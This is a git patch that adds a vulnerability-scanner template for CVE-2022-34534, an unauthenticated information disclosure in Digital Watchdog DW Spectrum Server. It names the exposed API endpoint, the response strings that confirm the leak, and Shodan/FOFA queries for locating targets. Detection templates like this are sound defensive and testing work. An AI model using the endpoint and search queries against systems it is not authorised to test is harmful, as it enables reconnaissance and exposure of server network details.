From 9a2b2f43baca2b13a340310412151cddffce80b3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 28 May 2024 13:15:26 +0530 Subject: [PATCH] Create CVE-2022-34534.yaml --- http/cves/2022/CVE-2022-34534.yaml | 38 ++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/cves/2022/CVE-2022-34534.yaml diff --git a/http/cves/2022/CVE-2022-34534.yaml b/http/cves/2022/CVE-2022-34534.yaml new file mode 100644 index 0000000000..7b7501b58a --- /dev/null +++ b/http/cves/2022/CVE-2022-34534.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-34534 + +info: + name: Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure + author: ritikchaddha + severity: high + description: | + Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call. + reference: + - https://gist.github.com/secgrant/820faeeaa0cb4889edaa1d6fef83deab + - https://nvd.nist.gov/vuln/detail/CVE-2022-34534 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-34534 + cwe-id: CWE-200 + cpe: cpe:2.3:o:dw:spectrum_server_firmware:4.2.0.32842:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dw + product: spectrum_server + shodan-query: http.favicon.hash:868509217 + fofa-query: icon_hash="868509217" + tags: cve,cve2022,digital-watchdog,dw,spectrum,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/api/moduleInformation" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "name\":", "cloudHost\":", "remoteAddresses")' + - 'contains(header, "application/json")' + - 'status_code == 200' + condition: and